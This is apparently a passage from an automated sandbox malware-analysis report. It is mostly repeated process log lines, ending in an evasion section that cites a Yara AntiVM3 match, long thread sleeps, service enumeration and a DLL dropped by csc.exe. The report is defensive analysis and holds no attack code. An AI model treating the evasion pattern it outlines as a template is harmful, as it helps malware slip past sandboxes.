                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
                      Delayed program exit found
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F7E2 Sleep,ExitProcess,11_2_0040F7E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_0041A7D9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7903Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1761Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1673Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3325Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6444Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 4619Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 4848Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1774Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep count: 7903 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636Thread sleep count: 1761 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 984Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4720Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 3325 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 6444 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5572Thread sleep count: 259 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5572Thread sleep time: -129500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5712Thread sleep count: 4619 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5712Thread sleep time: -13857000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5712Thread sleep count: 4848 > 30Jump to behavior
